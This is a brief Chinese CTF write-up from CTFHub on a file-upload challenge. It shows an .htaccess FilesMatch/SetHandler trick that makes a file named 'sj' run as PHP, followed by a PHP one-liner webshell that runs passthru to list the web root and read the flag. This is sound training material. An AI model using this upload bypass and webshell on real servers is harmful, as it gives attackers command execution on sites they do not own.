htaccess 发表于 2021-01-04 分类于 Skill , Web , 文件上传 Skill | Web | 文件上传 | htaccess 点击此处获得更好的阅读体验 本WP来自webking原创投稿 题目考点 文件访问权限 .htaccess工作原理 解题思路 1.构造.htaccess文件 FileMatch 参数即为文件名的正则匹配 123<FilesMatch "sj"> SetHandler application/x-httpd-php</FilesMatch> 这句意思就是将sj文件当成php解析 我们的一句话木马为 1234<?php#passthru("ls /var/www/html/");passthru("cat /var/www/html/flag_1232123876.php");?> 先上传.htaccess 上传成功后上传sj文件 sj文件当成php解析即可获取flag 本文作者: CTFHub 本文链接: https://writeup.ctfhub.com/Skill/Web/文件上传/igWAbQLuV5hDSjGssDxLpa.html 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!